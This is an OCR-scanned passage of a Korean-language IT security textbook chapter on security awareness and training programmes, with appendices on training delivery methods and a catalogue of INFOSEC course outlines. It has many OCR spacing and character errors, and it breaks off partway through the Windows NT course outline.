된다. 그러므로 평가는 강습과정의 계속 진행되는 전일적인 한 측면으로 간주되여야 하 
며 시 간과 돈은 다 예 산에 잘 계 획 되 여 야 한다. 
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요 약 


IT 체 계보안은 기 관운영 의 모든 측면과 련관되 는 빨리 전개 되 며 위 험 도가 높은 분야 
이다. 회사들과 전반기관들은 종업원들이 자기 책임을 잘 수행하게 하며 IT 체계자산과 
정보를 보호할수 있게 하는 흘륭한 의식화，강습과 교육을 종업원들에게 보장해야 할 어 
려운 문제를 안고 있다. 

종업원들윷 퍼관의 가장 기본적 인 구성요소이며 강습 받은 종업원들은 정보체 계를 효과 
적으로 실행하며 보호하는데서 결정적역할을 한다. 

이 장에 서 는 정 보체 계 ( IS ) 보안양성프로그람의 각이한 측면들을 개 괄하였 다. 첫 단계 
는 의 식 화과정 을 작성하는것 이 다. 의 식 화과정 은 종업 원들에 게 IT 보안문제 들에 각성 을 높 
이 도록 하는 단계 를 설정하도록 한다. 의 식 화과정 은 또한 IT 체 계 사용자들을 보안양성프 
로그람의 첫 단계에 준비시 킨다. 다시 말하여 모든 종업원들에게 IT 보안의 기본개념을 인 
식 시 킨다. 강습초보로부터 시 작하여 각이한 특정 된 구체 적 인 학과목들을 종업 원들에 게 
인식시 킨다. 이 런 특정한 강습과목들은 기 관이 IT 체 계보안부문에 서 있게 되 는 각이한 작 
업 기능과 련관되 여 야 한다. 

강습과정 의 성 과에 결정 적영 향을 주는것 은 상급경 영 진의 지 원과 승인을 받는것 이 
다. 과정생명주기의 매 단계에서 중요한것은 모든 강습조성원들과 집행리사들에게 실 
태보고를 배 포하여 그들이 발전하는 추세 에 따라 가도록 하는것 이 다. 어 떤 경 우에 는 
다음 단계 로 이 행 하기전에 상급경 영자로부터 승인을 직 접 받는것 이 중요할수(혹은 필 
요할수) 있다. 

강습진행의 다섯가지 단계들은 모든 IS 보안강습과정과 련관된다. 첫 단계에서는 강습 
의 필요성을 분석하고 강습과정의 목표와 목적들을 세운다. 필요성이 일단 설정되면 다 
음 단계 에서는 강습의 설계를 시 작한다. 강습과정 을 설계문건이 나 프로그람설계도형 태로 
문건화하는것 이 중요하다. 설 계문건 이 강습과정개 발의 방향을 규정 하기 때 문에 모든 당사 
자들은 설 계문건을 집 행 하기 에 앞서 재 검 토하고 승인하여 야 한다. 

개 발단계에서는 강사자료，강습생자료，교실활동 등과 갈은 모든 강습요소들을 묶어 
주게 되며 기술적인것이라면 매체요소들의 문서 및 화상만들기와 프로그람작성을 묶어 
주게 된 다. 강습과정개 발이 완성 된 경 우에 실현 단계 의 첫 목표는 자료의 시 험 으로 시 작 
된 다. 이 런 상태 에 서 강습설 계 집 단은 학습자의 효과를 위한 자료를 평 가하게 되 며 프로 
그람의 실행 에 앞서 임의의 문제점 을 개정하게 된다. IS 보안강습과정전반에 평 가과정 을 
포함시키 는것은 그 과정의 성과를 보장하는데 전반적 인 의의를 가진다. 시 간이 나 돈과 
갈은 자산은 강습자료의 효과성 을 평 가하는데 그리 고 학습과 회 사의 필 요성 을 만족시키 
는데 리용하여 야 한다. 평 가과정 의 기 본요인은 IT 보안강습과정 의 설계, 개 발 및 실현단계 
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에 평가과정을 포함시키는것이다. 

강습학과목의 몇가지 견본들이 is 보안강습과정에 건의되였다. 기술이 변함에 따 
라 커지는 IT 보안의 난관들을 극복하는데 필요한 강의과목들도 변하여야 한다. 이런 
변화들로 하여 현재 의 학과목들을 수정개 선하지 않으면 안된다. 또한 부단히 변화되 
는 IT 체계의 발전과 개선을 위해서는 새로운 학과목들을 내와야 할것이다. 그러므로 
IS 보안강습과정 과 학과목들은 새 로운 요구를 실 현할수 있도록 신축성 있게 설정되 여 
야 한다. 

매 기관에서는 또한 IT 전문가들의 장성계획을 세워야 한다. IT 보안기능은 기술 
및 경영에서 복잡하게 되였다. 회사들은 IT 보안에서 제기되는 어려운 문제들을 해결 
할수 있고 변화발전하는 기술문제들에 보조를 맞추어 나갈수 있는 교육 받은 IT 보안 
전문가들을 요구하고 있다. 기 관들에 서 는 적 당한 사람들을 IT 보안전문가로 선발지명 
하고 그들을 제기되는 문제들을 풀수 있고 선견지명이 있는 IT 보안전문가들로 키워 
야 할것이다. 

정 보체 계보안양성 과정 을 개 발하는 어 려 운 문제 에 직 면 하게 되 는 경 우 그 과정 이 개 
별 적 인 한 사람에 의하여 수행 될수 없 다는것 을 명 심하는것 이 중요하다. 개 발계 획 들에 모 
든 부서들이 힘을 집중하도록 경영진이 조직사업을 하는것을 포함한 기관전반적인 광범 
한 노력과 협조가 있어 야 이 보안문제를 해결할수 있다. 모든 사람들을 이 과정에 망라 
시키게 되 면 그들에 게 주인다운 태도와 책 임성 을 북 돋아 주는 추가적 인 우점 이 있게 된 
다. 또한 일 군양성(즉 경 영 자，강습설계 자와 강습일 군양성 )과 IT 보안전문가양성 에 대 한 
전 문지 식 은 강습목적 을 달성 하는데 필 요한것 이 다. 

항상 최 종결과를 기 억 하라.《 훌륭한 IT 강습과정 은 IT 체 계 자산과 그 정 보의 무결성，리 용 
성，비밀성 즉 IT 보안의 최우선적목표를 담보할수 있게 한다.》 
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제 1 9장. 보안의식의 계발: 부록 

쑤즌 디 핸취 

부록 1： 강습전략(강습전수방법) 


강사지도식강습 

전통적인 강습전략은 강사의 지도밑에 강습생들이 그롭별로 모여서 강습 받는 전략 
이 다. 강습생들은 한 교실에 모이고 강사 혹은 부강사가 강습을 진행한다. 강사와 강습생 
들사이에는 짧은 대화가 있을수 있다. 보통 이런 강습은 강습자의 설계와 개발단계까지 
는 비용이 가장 적게 들지만 실행 단계에서 특히 강습생들이 중심지까지 통근하여 모이게 
되는 경우에는 비용이 제일 많이 들수 있다. 

교재를 리용하는 강습 

교재에 기초하는 강습은 개별적사람들이 자기 진도에 맞추어 학습하게 되는 강습형 
태이다. 강습생은 강습내용이 담긴 지정된 교재(혹은 임의의 책)를 학습한다. 교재에 기 
초한 강습에서는 강사와의 대화가 리용되지 못한다. 그러나 교재에 담겨 있는 정보는 
보통 학습문제에 대한 전문지식 이 있는 필자가 쓴것 이다. 또한 강습생은 자료가 필요할 
때에는 그것을 찾아서 필요한 부분들을 다시 고찰할수 있다(혹은 다시 읽을수 있다.). 

해답서 훅은 과제서를 리용하는 강습 

해답서 혹은 과제서에 의한 강습은 개별적인 사람들이 자기 진도에 맞추어 진행하는 
강습이다. 이것은 가장 오래된 원격학습형태이다(즉 통신학습형태). 과제서에는 강습교재， 
도해와 련습문제들이 있다. 련습문제들은 강습생들에게 배운 내용을 가지고 련습할수 있 
는 기회를 주어 과제서에 있는 내용들을 학습할수 있게 도와 준다. 일부 경우에 강습생 
들은 해당 주제에 대한 인식능력을 보여 주는 시험을 끝내야 한다. 

비데오를 리용하는 강습 

비데오를 리용하는 강습은 흔히 개별적인 사람들이 자기 진도에 맞추어 진행하 
는 강습형 태 이 다. 정 보는 표준 VHS 비 데오카세 트록화기 ( VCR ) 에 서 쓸수 있 는 표준 
VHS 비 데오카세 트레 프에 서 받게 된다. 개 별적사람들의 진도에 따라 진행하는 강습에 
서 는 강사와의 담화가 적 용되 지 못한다. 그러 나 교실 에 서 비 데오를 리용하는 수업 인 
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경우에는 비데오에서 취급되는 자료를 놓고 대화를 동반하는 련습으로 토론분석할 
수도 있다. 

비데오에서는 공정들 또는 단계별 항목들의 동작들을 보여 줄수 있는 움직이는 그림 
들을 리용할수 있다. 비데오는 전수시간과 장소에 구애되지 않으며 필요한 경우에는 학 
습한것을 반복할수 있다. 

CBT 와 WBT 등 기술에 기초한 강습 

기술에 기초한 강습도 개별적사람들이 자기 진도에 따라 진행하는 강습이다. 어떤 
강습에서든지 강습전습에 콤퓨터를 리용하는것 이 기본으로 되고 있다. 기술에 기초한 강 
습인 경우에는 강습과정대로 학습할수 있게 하는 콤퓨터와 쏘프트웨어를 리용하여 강습 
내용을 전달한다. 

이 런 강습은 자기원판디 스크와 CD - ROM 을 통하여 전수되 는 혹은 봉사기 에 적재 되 
는 를퓨터 에 기 초한 강습이 거 나 인터네 트나 인트라네 트를 통하여 전수되 는 Web 에 기 초 
한 강습일수 있다. 

콤퓨터 에 기 초한 강습 ( CBT ) 에 는 개 별 사용지도서，실 천 련습문제，모의 또는 모방， 
연시련습문제 와 유희 를 포함하여 여 러 가지 전시 방법 들이 있다. CBT 에 는 많은 긍정 적 
인 특성들이 있다. 이것들은 지리적으로 널려 있는 많은 강습생들에게 강습자료 한조 
를 보내 주어 야 하는 기 관들에 서 중요할수 있다. CBT 의 우점 에 는 즉시 적 인 반응，강 
습자료학습에 대 한 강습생 들의 조종과 비 데오，음성，소리 와 동화상과 갈은 다매 체 의 
결합이 속한다. 

초기 CBT 개발원가가 계산되면 임의의 시간에 임의의 수의 강습생들에게 CBT 를 
제 공할수 있 다. 주문에 의하여 만든 CBT 프로그람에 서는 강습생 들에 게 필 요한 문제 에 
중점 을 둘수 있 으므로 강습시 간과 비 용이 많이 줄어 들수 있다. CBT 는 또한 강습생 들 
의 통근비 용을 줄이거 나 없 앨 수 있다. 그러 므로 총적 인 강습비 용은 줄어 들수 있 다. 자 
체의 진도에 따라 진행되는 개별화된 강습형태로서의 CBT 는 강습생들의 실정에 맞게 
적 용될수 있는 적 응성 을 가진다. 실제 로 강습생 들은 구체 적 인 과목이 나 주제 를 선택하 
여 강습환경을 조종할수 있다. 비록 CBT 가 많은 우점을 가지고 있지만 그것이 강습의 
모든 필요성을 다 만족시 키지는 못한다는것을 기 억하는것 이 중요하다. 일정한 조건에 
서 는 CBT 가 더 적 당하고 효과적 이 며 비 용도 덜 든다. 그러 나 다른 경 우들에는 강습생 
들의 부정 적 인 태 도를 발로시 킬수도 있 고 강습과정 의 목표를 망치 게 할수도 있다. 실 
례로 CBT 강습을 받게 된 강습생들은 강습시간표를 짤데 대한 지시를 받고 강습을 근 
무시간외에 받게 될것이라고 생각한다. 이들은 강사의 지도를 밤으면서 강습 받는 강 
습생들이 근무시간내에 학습한다고 생각하므로 CBT 에서는 공정하지 못하게 시간을 요 
구한다고 볼수도 있다. 

CBT 에 는 교실 에 서 진행하는 강습과 같은 전통적 인 학습환경 에 서 도움을 주는 도구 
토서 콤퓨터 를 사용하는 콤퓨터 지원 학습 ( CAL ) 도 포함된 다. 콤퓨터 는 강습공정 에 서 투영 
기나 인쇄물과 같이 강습자에게 도움을 주는 장치이다. CBT 는 콤퓨터에서 개별적사람들 
의 성적을 평가하는 콤퓨터지원시험 ( CAT ) 도 포함한다. 강습생들은 콤퓨터상에서 시험을 
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치고 콤퓨터는 시험을 기록하고 성적을 종합한다. CAT 는 대부분의 콤퓨터에 기초한 강 
습제품에 포함되여 있다. 

Web 에 기초한 강습 ( WBT ) 은 널리 퍼져 있는 무제한한 청강생들에게 콤퓨터에 기초 
한 강습을 전수하는 새로운 창조적인 방법이다. WBT % CBT 의 현재 전수에서 갈라 져 
나온것이다. CBT 형식에서는 정보를 국부장치，봉사기 또는 CD - ROM 에 보관한다. WBT 
에서 는 정 보가 Web 을 통하여 분포되며 대체 로 먼곳 혹은 기 관의 중심봉사기 에 보관된다. 
정 보는 인터네 트탐색 기 와 같은 열 람기 라고 불리 우는 쏘프트웨 어응용프로그람을 통하여 
사용자에 게 연시된다. 내 용은 본문，도해，음성，비 데오와 동화상에 의하여 제 시 된다. 
WBT 는 시 간절 약과 용이한 접 근들을 비 롯하여 CBT 와 동일 한 많은 우점 들을 가진다. 그 
러 나 CBT 에 비한 WBT 의 중요한 우월성 의 하나는 정 보를 쉽 게 갱 신하는것 이 다. 강습자 
료를 바꾸어야 할 필요가 제기되면 봉사기에서 정보를 바꾼다. 그렇게 되면 누구나 새로 
운 정 보에 접 근할수 있 다. WBT 의 난관은 강습생 의 콤퓨터，기 관의 봉사기 와 리용할수 
있 는 대 역 너 비 에 기술적능력을 보장하는것 이 다. 

부록 2： IT 체계보안강습과정안 


INFOSEC 101 IT 보안기초 

개팔 이 과정 안에는 IT 체 계 의 모든 사용자들이 알아야 할 중요술어 와 개 념., IT 보안 
의 근본문제 들과 그것 들을 적 용하는 방법 그리 고 IT 체 계보안행 동규칙 들이 서 술되 여 야 한 
다. 이렇게 되면 IT 체계재부와 정보를 보호하는데서 모든 개별적사람들이 자기들의 역할 
이 어떠해 야 한다는것을 알게 될것 이 다. 

강습대상 이 강습은 특정한 직 무에 무관계하며 IT 체 계 를 사용하는 모든 종업 원들을 
위한것 이 다. 한마디 로 말하여 모든 종업 원들이 이 강습을 받아야 한다. 

강습내용 IT 보안은 무엇 이며 왜 그것 이 중요한가 ; 련방법률 및 규정들 ; IT 체 계 
의 취약성，위험 및 예민성 : 민감하지만 비밀화되지 않은 정보와 비밀화된 정보를 
포함한 정 보의 보호 : 하드웨 어보호，통과암호보호 : 매 체취급(즉 를로피 에서 정보의 
처리，보관 및 없애는 방법); 저작권 문제 : 무릎형콤퓨터보안 : 사용자책임 : 문제가 
생 길 때 련계 가질 사람 : 모든 IT 체 계사용자들과 련관된 다른 특정한 기 관들，기 관 
이 비밀화된 정보를 처리하는 경우에는 그것과 관련한 해설을 주어야 한다는것을 
알아 두라. 

주의 대부분의 기관들이 모든 종업원들에게 이 강습을 주려고 하기때문에 이 강습비 
용은 기술설비들을 통하여 전수되는 강습내용의 좋은 본보기로 된다. 이 강습에서는 비 
데 오를 리용하는 강습， CD-ROM 을 통하여 콤퓨터 를 리용하는 강습 혹은 기 관인트라네 트 
를 통하여 Web 만을 리용하는 강습형 태들을 리용하게 된다. 


290 



표 19 - 1 제기된 정보제계보안강습과정안 


과정안번호와 
내용수준 

과정 안명 칭 

강습대상 

가능 t 

INFOSEC 101 초급 

IT 보안기초 

모든 종업원 


INFOSEC 102 초급 

비밀정보를 처리 하는 
망 IT 보안기 초 

비밀정보를 처리 하는 망에 
접근하는 모든 종업원 


INFOSEC 103 초급 

IT 보안기초一년 례 재교육 

모든 종업원 

INFOSEC 

INFOSEC 104 초급 

IT 보안기본원리 

IT 보안을 직접 책임진 

사람들 


INFOSEC 201 중급 

IT 체 계보 안계 획 과 개 발 

IT 체계보안계획의 개발을 
책임진 사람들 

INFOSEC 

INFOSEC 202 중급 

IT 체 계 사고방지 계 획의 
개발방법 

IT 체 계사고방지 의 계 획의 
개발을 책임진 사람들 

INFOSEC 

INFOSEC 203 중급 

IT 체 계 보호를 위한 체 계 
또는 기술적책임 

IT 체계의 계획 및 일상 
조작을 책임진 사람들 

INFOSEC 

INFOSEC 204 중급 

IT 체 계보안을 위한 
생 명 주기 계 획 화 

IT 체계의 리해와 설계를 
책임진 사람들 

INFOSEC 

INFOSEC 205 중급 

기 본정 보체 계 보안관 
(ISSO) 강습 

ISSO 또는 대리 ISSO 로 
임명된 사람들 

INFOSEC 

INFOSEC 206 중급 

IT 체계의 검증 

임명된 검열관역할을 
담당한 사람들 

INFOSEC 

INFOSEC 

INFOSEC 207 중급 

책 임경 영자들을 위한 
정보체계보안 

책 임 러 사수준의 
경영자들 


INFOSEC 208 중급 

망 및 인터네트보안개론 

망접속을 책임진 
사람들 

INFOSEC 

INFOSEC 

INFOSEC 209 중급 

암호학개론 

망접속 정보 및 보안을 
책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 301 상급 

검열기록부 료해 

검열기록부재검토를 
책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 302 상급 

Windows NT 4.()1 보안 

Windows NT 4.01 을 사용하 
는 망을 책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 303 상급 

Windows 2000보안 

Windows 2000올 4 -§-«>-& 

망을 책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 304 상급 

UNIX 보안 

UNIX 를 사용하는 망을 
책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 305 상급 

상급 ISSO 강습 

ISSO 또는 대리 ISSO 로 
임명된 사람들 

INFOSEC 

INFOSEC 306 상급 

사고처 리 

IT 보안사고처 리 를 
책임진 사람들 

INFOSEC 

INFOSEC 

INFOSEC 307 상급 

위험 부석 밀 평 가름 

위험부석음 책임지 사람듬 

INFOSEC 










비밀정보를 처리하는 망들 우 I 한 INFOSEC 102 IT 보안기초 

개팔 이 강습은 IT 체계의 모든 사용자들이 알아야 할 주요술어와 개념들， IT 보안의 
근본원리들과 그것을 적용하는 방법 및 행동규칙들을 해설한다. 이 강습은 비밀정보를 
처리하는 망에 접근하는 종업원들에게 적합한 정보를 주기도 한다는것이 다를뿐 
INFOSEC 1()1 과 류사하다. 

강습대상 이 강습은 비 밀정 보를 가공하는 망에 접 근하는 모든 종업 원들을 위한것 이 다. 

강습내용 IT 보안이 란 어떤것 인가 그리고 그것 이 왜 필요한가 : 련방법률과 규정들 ; 
IT 체계의 취약성，위험 및 기밀도 ; 비밀정보의 보호 ; TEMPEST 설비를 비롯한 하드웨어 
보호，통과암호보호 ; 매체 처 리(즉 비밀정보의 처 리，보관 및 삭제 방법) ; 저 작권문제 : 무 
릎형콤퓨터보안，사용자책임 : 문제가 제기될 때 련계가질 사람 : 그리고 분류된 IT 체계의 
사용자들과 련관된 다른 특정한 기 관방책 들 

INFOSEC 103 IT 보안기초-년례재교육 

개팔 이 강습은 IT 보안기초 ( INFOSEC ) 에 이 어 지는 련속과정 이 다. 기술이 변함에 따 
라 IT 보안에 대한 요구와 도전도 또한 변한다. 이 과정에 기관들은 말단사용자가 당하는 
가장 심 각한 난관을 주시하게 될 것 이 다. 재 교육과정 안의 초점 은 이 런 필 요성 을 해 결 하는 
방법 에 돌려 질것 이다. 

강습대상 재 교육에 는 IT 체 계 를 리용하는 모든 종업 원들이 참가하게 된다. 

강습내용 주제들은 기관이 직면하는 련관된 IT 보안의 난관들에 해당한것 이다. 

INFOSEC 104 IT 보안의 근본원리 

개팔 이 과정안은 IT 체 계 의 보호와 직 접 관련된 종업 원들을 위한것 이 다. 이 과정안 
은 련방법 률과 기 관의 특정한 방책과 절차들， IT 체 계의 취 약성과 위 험，그 위 험을 완화시 
킬수 있게 하는 대응책들 그리고 물리적，인적，행정적 및 체계 또는 기술적조종들에 대 
한 근본적리해를 보장한다. 

강습대상 이 과정안은 IT 보안기 초보다 더 많은것 을 필요로 하는 종업 원들을 위한것 
이 다. 이 과정안은 더 높은 수준의 자료를 학습하는데 서 필수과목으로 리 용될수 있 다. 이 
과정안은 체 계관리 자，체 계 운영 진，정 보관，정 보체 계보안관，보안관과 프로그람관리 자들을 
포함한다. 

주의 이 과정안은 INFOSEC 1()1 과정안대신에 사용할수 있 다. 이 과정안은 IT 체 계 의 
보안과 직접적으로 련관된 작업을 책임진 종업원들을 위한 준비과정안이다. 

INFOSEC 201 IT 체계보안계획의 개발 

개팔 모든 IT 련 방체 계 는 법 률에 따라 그 일 반지 원체 계 들과 주요응용프로그람을 위한 
IT 체 계보안계 획 을 가져 야 한다. 이 과정안은 NIST SP 800-18 정 보기 술체 계 를 위한 보안 
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계획개발지도서에 제시된 지침에 따라 어떻게 IT 체계보안계획을 개발하겠는가에 대하여 
설명을 준다. 

강습대상 IT 체계보안계획을 준비하고 실현하도록 하는 책임을 진 체계소유자(혹은 
집 단). 많은 기 관들에 서 IT 체 계보안계 획 은 체 계 관리 자，정 보관，보안관 및 정 보체 계보안관 
과 같은 집 단에 의 하여 개 발될 것 이 다. 

강습내용 체계식 별，보안책 임관계할당 : 체계설명 및 목적 : 체계호상련결，정보의 기 
밀성과 공유 : 위험평가 및 관리 : 행정적，물리적，인적，체계적 및 기술적통제방법 ; 생명 
주기계획 : 보안의식화 및 양성 

주의 이 과정안의 설계 는 기 관에서 승인 받은 방법 과 사전에 규정한 형 식 으로 IT 체 
계보안계획의 개발에 관한것으로 주문작성되여야 한다. 강습생들은 기관이 승인한 계획 
개 발에 필 요한 도구를 소유하고 강습을 졸업해 야 한다. 

INFOSEC 202 IT 체계사고방지계획 개발방법 

개팔 IT 체계들이 직면하고 있는 위험요소들은 기업을 계속 운영하기 위한 효과적인 
계 획과재해복구계획을 잘 세울것을 요구한다. 기 업을 계속 운영 하기 위한 계획에는 와해 
상태로부터의 회복문제 및 위험기능에 대한지원을 계속할데 관한 문제가 반영된다. 재 
해복구계획에는 재 해로부터의 회 복문제, 주요기능을 정상운영 에 로 복구하는 문제가 반영 
된다. 첫 단계 는 기 관의 주요 기 능과 공정 들을 밝히 고 회 복기 간들과 그 대 안들을 결정하 
는것 이 다. 이 과정안에 서 는 회 복의 우선권，호상의 존처 리 와 회 복을 요하는 기 초기 술하부 
구조를 밝히는 면밀한 기업영향분석 (BIA) (기관안에서 주요기업기능들을 식별하고 최대중 
지 가능시 간이 상으로 기 능중지 의 영 향을 결정하는)을 진행하는 방법 에 대 하여 론의 되 고 
있 다. 

강습대상 IT 체계의 계획과 관리를 책임진 종업원들. 여기에는 체계행정경영자，정보 
관，보안관 및 정 보체 계보안관이 속한다. 

강습내용 IT 체계 사고방지 계획이란 어떤것인가，기업 영향분석 (BIA) : 싸이 트설정 (만가 
동싸이 트，동면싸이 트，작업 싸이 트) ; 회 복목적 들 ; 회 복요구사항들 : 회 복실현 : 예 비안과 
계획 ; 계획시험 :회복시험결과의 평가 

주의: 이 과정안의 내용은 IT 체 계사고방지계 획을 작성 하기 위한 기관에서 승인된 방 
법 론을 가지 고 주문하여 편성하여 야 한다. 가능하면 사전에 승인된 형식 과 방법 에 의거 
하여 해 야 한다. 

INFOSEC 203 IT 체계보호를 우 I 한 체계적 및 기술적책임관계 

개팔 이 과정안은 IT 체 계 의 취 약성 과 물리 적 재 산과 정 보보호에 필 요한것 을 설 명하는 
것 으로부터 시 작된다. 이 과정안에서는 물리 적환경 보호，쏘프트웨어의 설치，접근조종，조 
작체 계 와 보안요구를 실 현하는 응응프로그람과 갈은 특정한 요구들에 초점 을 둔다. 

강습대상 IT 체계의 계획과 일상조작에 망라되며 책임지는 종업원들. 

여 기 에는 체 계행정경 영 자들，체 계성원들，정 보관들 및 정 보체 계보안관들이 속한다. 
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강습내용 IT 체계보안개괄 ; IT 체계의 취약성，위험 및 기밀도의 식별; 효과적인 대응 
책식 별 ; 행정적임무들(즉 기록부와 기록의 관리) ; 물리적임무들(즉 봉사기실보안) ; 호상 
련결보안 : 접근조종(식별과 인증) : 작업조의 파일관리(작업조와 공유파일의 설정) : 작업 
조와 파일승인(접근승인체 계구성) : 검 사사건과 기 록부 ; 그리 고 IT 보안유지 

INFOSEC 204 IT 체계보안들 우 I 한 생명주기계획 

개팔 체계생명주기는 시 작부터 마지막까지 IT 체 계 를 구축조작하기 위한 모형 이 다. 
이 과정 안에 서 는 IT 체 계 들을 실 현하기 에 앞서 그 취 약성 과 위 험 식 별 방법 의 근본원 리 들과 
IT 체계설계기간의 IT 보안문제를 취급한다. 또한 IT 체계의 실현단계에서 나타날수 있는 
위험요소들의 식별，이 위험요소들의 축감，보안에 초점을 두면서 표준조작절차에 대한 
해 설， IT 체 계 의 안전성 시 험 방법，기 한완료된 자산의 처 리 문제 들을 취 급한다. 

강습대상 IT 체 계의 리해와 설계임무를 맡은 경 영 자들. 여 기 에는 계 약책 임 자들，정보 
관，체 계관리 자들, 프로그람관리 자들 및 정 보체 계보안관이 속한다. 

강습내용 설 계 공정 에 서 IT 보안의 필 요성확인 ; 인식 단계 에 서 IT 보안개 발 : 련 방법 률과 
규정들 ; 기관방책과 절차 ; 인식，개발，설치 및 시행조종 : 위험성관리 : 표준조작절차설 
정 : 설 비 와 매 체 의 파괴 및 처 리 

주의 초점은 IT 보안과 련관된 결정채택활동을 위한 기관의 구조 및 공정들의 실행과 
리행에 두어야 한다. 기관의 특정한 방책，지침，요구，역할，책임 및 자원할당을 사전에 
설정해 야 한다. 

INFOSEC 205 정보체계보안관 ( ISS 이기초강습 

개팔 여 기서는 ISSO 역 할과 임무에 대 하여 간단하게 소개한다. ISSO 는 IT 체계보안계 
획을 실현하며 IT 체계에 대한 보안감시를 보장한다. 또한 IT 보안의 중요성과 일상조작에 
서 보안관리역할을 어떻게 보장하는가 하는데 대한 리해에 기본을 둔다. 

강습대상 ISSO 혹은 이 와 대 등한 직무에 임 명된 종업 원들. 여 기 에는 체 계관리 자，정 
보관，프로그람관리자 혹은 보안관들이 속한다. 

강습내용 IT 보안개관，취약성，위험 및 기밀도 ; 효과적인 대응책 : 행정적조종，물리적 
조종，체계적 혹은 기술적조종 : 사고처리 : 보안의식화 

주의 모든 기관들에서는 IT 체계에 대한 보안감시를 책임진 정보체계보안관으로 한사 
탐을 임명해 야 한다. 

INFOSEC 206 IT 체계의 승인 및 보증 

개팔 여 기서는 IT 체계 가 정보보안요구에 응한다는것을 증명하는 방법 에 대 한 정 보를 
제공한다. 이 정보에는 IT 체계를 특별하게 안전한 방법으로 조작하며 비밀화된 혹은 민 
감하지만 비밀화되지 않은 ( SBU ) 정보를 련방 혹은 기관의 요구에 따라 보호하도록 최종 
승인을 주는 문제 가 포괄된다. 
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강습대상 지적된 비준공무원의 역할과 책임을 말은 사람들. 여기에는 프로그람관리 
자，보안관，정보관，정보체계보안관들이 속한다. 

강습내용 련방법률과 규정 : 기관방책과 절차 ; 취약성，위험 및 기밀도 ; 효과적인 대 
응조치 : 접근조종 : 그룹 및 파일허가 : 비밀정보와 SBU 정보의 보호 ; TEMPEST 및 다른 
설비의 보호:승인과정:사건처리:생명주기관리:표준조작절차:위험관리 

INFOSEC 207집행경영인들이 알아야 할 정보체계보안 

개팔 이 과정 안에서 는 집 행 경영 자들이 알아야 할 정 보체 계 보안문제 들에 대 한 개 팔을 
준다. IT 체계의 계획 및 관리보안의 필요성과 인적 및 재정적지원의 할당， IT 보안성원들 
을 솔선수범 으로 이끌어 주는 문제 가 강조된다. 

강습대상 예 견되 는 집 행리 사급경 영 자들 

강습내용 IT 체 계보안개 관 : 련방법률 및 규정 ; IT 체 계의 취 약성 과 위험 ; 효과적 인 대 
응책 ; IT 보안관리 및 감시의 필요성 ; IT 보안예산 

주의 이 과정안의 내 용은 매 기 관에 서 강습내 용이 집 행리 사급의 경 영 진의 특정한 요 
구를 만족시킬수 있도록 주문구성하여야 한다. 내용이 특별한 주제들에 기초하여 몇개의 
짧은 대 화형 의 과들로 구성할것 이 예 견된 다. 제 한된 시 간을 효과적 으로 리 용하기 위하여 
일부 과들은 기술에 기초한 응용프로그람을 통하여 전수될수 있다. 

INFOSEC 208망과 인테 dl 트보안개론 

개팔 이 과정안에 서 는 기 관의 IT 체 계 자원과 정 보를 보호하기 위한 망과 인 터네 트 혹 
은 인트라네트보안방책을 어떻게 개발하는가 하는 문제에 중심을 둔다. IT 체계의 취약성 
분석，각이한 외부위 험재검 토，위험 관리，승인 없는 접근으로부터 IT 체 계의 보호，방화벽 
및 자료암호화장치와 갈은 기술적대책을 전개하여 위험요소들을 줄이는 문제 에 초점을 
둔 다. 

강습대상 내부인트라네트와 외부인터 네트접속을 비롯하여 망접속실현，일상관리，감 
시 임무를 지 닌 종업 원들. 여 기 에는 체계관리 자，체 계담당일군들，정 보관，정 보체 계보안관， 
보안관 및 프로그람관리자가 속한다. 

강습내용 IT 망보안 및 인 터네 트개 관， TCP/IP 와 파케 트개 론，망접 속의 취 약성 과 위 험 
(해 커，위 법 부호，위 장，엿 보기，봉사거 절 공격 )리해，망접 속을 위한 효과적 인 대 응책 들(방 
책 #:，접 근조정，물리 적 보호，항비 루스，쏘프트웨어，방화벽，자료암호화 등) : 망 및 인 터 
네 트 혹은 인트라네 트보안방책 개 발 그리 고 인 터 네 트공격 인식 법 

INFOSEC 209암호학개론 

개팔 이 과정안에서는 암호작용을 개괄하게 된다. 여기서는 암호학의 기초개념들，이 
것들의 응용 및 적용으로서의 공통 및 전용의 주요알고리듬，암호열쇠분배와 관리，전자 
거래의 신뢰성을 보장하기 위하여 수자식서명의 리용，부인방지가 취급된다. 
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강습대상 망접속들의 관리 및 보안임무를 진 종업원들. 여기에는 체계관리자，체계담 
당일 군，정 보관, 정 보체 계 보안관，보안관들 그리 고 프로그람관리 자들이 속한다. 

강습내용 암호학개 념 들, 암호학적 모둘을 리 용하는 인증방법 들 ; 암호화，보증기 관개 
관 ; 수자식서명 ; 부인방지 : 하쉬함수와 통보문개요 : 비밀열쇠와 공개열쇠 암호화 그리고 
열쇠관리 


INFOSEC 3()1 검사기록부의 리해 

개팔 이 과정안은 검사기록부의 리해와 재검토에 중심을 두는 대화수법이다. 여기서 
는 어떤 형태의 사건들이 검사기록부에 등록되는가，흔히 이상한 사건들의 탐색방법，검 
사기록도구의 리용법，검사기록부에 기록보관하는 방법，검사에서 색출하는 흔치 않은 사 
건취급법을 배우게 된다. 

강습대상 일상 IT 체계조작의 감시관리 및 보장임무를 말은 종업원들. 여기에는 체계 
관리 자，정 보관，정 보체 계보안관이 속한다. 

강습내용 IT 체 계 사건의 리해 : 검 사기 록부재 검 토의 계 획 화 ; 검 사기 록재 검 토법，검 사기 
륵부를 통한 발견 및 람색법 ; 검사기록부재검토에서 제3자도구리용법 : 검사기록부에 있 
는 비정상체계사건의 처리법 

INFOSEC 302 Windows NT 4.0 봉사기 및 워크스테이션보안 

개팔 이 과정안에 서 는 봉사기 및 워 크스테 이 션조작체 계 들을 위하여 Windows NT 4.0 
보안특징 들을 잘 구성하는 방법 에 힘 을 넣 는다. 청 강생 들은 원도우즈 NT 의 보안특징 들 
을 배우며 실지체험을 목적으로 하는 콤퓨터학습실에 조작체계들을 설치구성하는데 참가 
한다. 

강습대상 이 과정안은 Windows NT 4.0 봉사기 및 워 크스테 이 션조작체 계 를 리용하여 
망을 설 치，구성，관리하는 임 무를 말은 종업 원들을 위한 과정안이 다. 정 보관，체 계 관리 자 
들, 체 계담당일 군들이 이 과정안을 배 울수 있 다. 

강습내용 Windows NT 4.0 봉사기와 워크스테이션조작체계 개관 ; 식별 및 인증조종 : 
